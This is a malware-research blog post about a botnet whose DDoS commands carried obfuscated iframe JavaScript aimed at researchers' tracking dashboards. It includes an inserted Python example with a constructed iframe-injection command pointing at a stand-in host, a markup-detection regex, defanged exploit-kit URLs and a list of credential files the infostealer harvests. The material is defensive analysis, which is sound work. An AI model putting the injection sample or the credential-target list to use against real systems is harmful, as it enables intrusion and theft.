Beware the trolls, secure your trackers

Posted on August 14, 2012 | Category: Botnets, Malware

by Claudio Guarnieri

(Note: the post was originally written on Aug 8th 2012)

You track botnets? Right, we do as well.
You spent your weekends building your slick botnet trackers and some fancy web interface? Damn, we did too.

But let’s face the truth, DDoS is f**king boring. What gives better sense to your day than some random crook trolling you and your monitoring infrastructure? Nothing.
So here’s what happened today…

Since I'm not really following the DDoS scene a lot lately, I had kinda left aside for some time the trackers that I built and that we are using internally at Shadowserver. Today I decided to open them up again, just to show them some love and check whether anything interesting was being targeted, while sipping my coffee.
I was expecting the usual amount of porn websites, random Russian forums, Lineage II shards and the traditional average target for the traditional average botnet, but that wasn't the case today… something stood out.

One of the DirtJumper botnets we are tracking, located on the domain “bnbgcw.com” started spreading some weird commands:

The beginning of the command is a traditional DirtJumper response: some basic parameters (like threads, duration of the attack, delay of C&C polling and such) separated by a dash and followed by the actual target of the DDoS attack. And here comes the funny thing: appended to the original target (which was already being attacked previously and isn't really relevant for us at this stage) is a whole bunch of obfuscated JavaScript code.

I removed the whole obfuscated code, but you can see it decoded as follows:


So what this thing does in short is:

  1. dynamically generate a domain out of a given seed and the current date
  2. use the domain to build a landing URL
  3. embed the URL in an <iframe> which is then printed in the page body
In the end, it will load a page located at:
hxxp://kegkvfoagyqoouky[.]ru/in.cgi?15

So, assuming that this guy is not dumb enough to try to magically remote-exploit or inject the target page through the use of his botnet, my idea is that what he is actually trying to achieve is to exploit security researchers like us who are tracking his own botnet.
It's actually quite a sharp idea: your tracker pulls the command from his C&C, stores it in some sort of database and prints it in your fancy web interface; you didn't bother to sanitize the data, the <iframe> gets embedded in your own page and BANG, you're pwned.
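To make the tracker-side bug concrete, here is an added example (not code from the post or from Shadowserver's trackers) that parses a constructed DirtJumper-style response, flags a target field that carries markup instead of a bare URL, and shows the unsanitized rendering beside the escaped one. The dash-separated layout follows the post's description; the parameter order, the three-parameter count and the sample command are assumptions.

```python
import html
import re

# Constructed sample of a DirtJumper-style C&C response: a few dash-separated
# numeric parameters (threads, duration, polling delay; the order is an
# assumption) followed by the attack target, with an <iframe> smuggled in
# after the target URL, as the post describes.
SAMPLE_COMMAND = (
    "10-3600-60-http://victim.example/forum/"
    '<iframe src="http://landing.example/in.cgi?15" width=0 height=0></iframe>'
)

# Markup that has no business in a DDoS target field.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(iframe|script|img|object|embed|svg)\b|javascript:|\bon\w+\s*=",
    re.IGNORECASE,
)


def parse_command(raw, n_params=3):
    """Split the leading dash-separated parameters from the target.

    Only the first n_params dashes act as separators, so dashes inside the
    target URL itself are preserved.
    """
    parts = raw.split("-", n_params)
    if len(parts) != n_params + 1:
        raise ValueError("unexpected command layout")
    return {"params": parts[:n_params], "target": parts[n_params]}


def is_suspicious_target(target):
    """Heuristic: a target should be a bare URL and never contain markup."""
    return bool(MARKUP_RE.search(target))


def render_row_unsafe(cmd):
    """The tracker bug from the post: C&C data pasted straight into HTML."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        "-".join(cmd["params"]), cmd["target"])


def render_row_safe(cmd):
    """Escape every attacker-controlled field before it reaches the page."""
    params = html.escape("-".join(cmd["params"]), quote=True)
    target = html.escape(cmd["target"], quote=True)
    return "<tr><td>%s</td><td>%s</td></tr>" % (params, target)
```

Escaping on output is the fix; the heuristic is only there to raise an alert when a C&C starts handing out commands that look like this one.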

If you run the URL through Thug (thanks Angelo!), you’ll see that the page (when meeting certain requirements) actually redirects to:

hxxp://wertbuy.toythieves[.]com/main.php?page=9dd146e88937797b

A BlackHole setup which, after a failed attempt at loading a Java applet, Torb.jar (1/41), successfully used the infamous Microsoft MDAC RDS.Dataspace ActiveX vulnerability to exploit the browser and drop the payload. Nothing new, traditional BlackHole behavior, but you can find the complete Thug report here.
Upon successful exploitation, it drops a payload with the following characteristics:

File size: 348672 bytes
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

We are not sure yet about the nature of the malware, as it has an extremely low detection rate (1/40), but it looks consistent with Pony, a loader and infostealer widely used in ZeuS campaigns.
The first reason we believe so is that, just like Pony, this sample is not persistent: it executes from memory, deletes itself and just disappears.
The second reason is the data it tries to collect and steal:

C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\
C:\Documents and Settings\User\Application Data\CuteFTP\sm.dat
C:\Documents and Settings\User\Application Data\CuteFTP\
C:\Documents and Settings\User\Application Data\FlashFXP\3\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\History.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\History.dat
C:\Documents and Settings\User\Application Data\FileZilla\sitemanager.xml
C:\Documents and Settings\User\Application Data\FileZilla\recentservers.xml
C:\Documents and Settings\User\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\User\Application Data\SmartFTP\
C:\Documents and Settings\User\Application Data\TurboFTP\
C:\Documents and Settings\User\Application Data\FTP Explorer\
C:\Documents and Settings\User\Application Data\Frigate3\
C:\Documents and Settings\User\Application Data\VanDyke\Config\Sessions\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\profiles.ini
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\bookmarkbackups\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\minidumps\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\signons.sqlite
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\secmod.db
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\cert8.db
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\key3.db

And much much more…

It then establishes a network communication to “coppercreek.ru”:

We are not sure about the nature of the encryption; it will take more time to analyze it. If you have already encountered this and you are able to recognize the family, please let us know.
No additional payload was dropped.

It's very interesting to note that this payload was uploaded both to VirusTotal and to Malwr.com today from a Verizon Wireless connection in the USA. As you can see, the analysis on Malwr failed (side note: Malwr is currently running a very outdated version of Cuckoo Sandbox, whose version 0.4 is perfectly able to analyze this sample).
This attack has been going on for a couple of days already, but the latest version was updated today.
A very similar version of this sample, with the same behavior and file name, had been uploaded by the same guy a few days earlier, again to Malwr.com and to VirusTotal.
In that case the results of Malwr's analysis as well as antivirus detection were much better; therefore, unless some of you guys come up these days to tell me it was him, this makes me believe that the mastermind behind these attacks has been actively trying to enhance his evasion and anti-detection techniques until he reached satisfying results.

This could be a whole big speculation: the guy might just be totally dumb, and there was no intention to actually target botnet researchers.
But if this is actually the correct interpretation, it's a very interesting learning experience and a warning to all the researchers out there feeling safe: our security panopticon could actually turn inside out, making us the ones being watched.

Update #1: the detection rate of the sample increased to 16/41 at this time.

Update #2: Our friend Armin from WebSense informed us that this attack matches an ongoing campaign that they have been tracking. It seems this DirtJumper C&C got compromised and is distributing the JavaScript code we presented. It's kinda hilarious, crooks getting pwnd by other crooks, but the result is still the same: harmful code included in the context of trusted applications such as our botnet trackers.
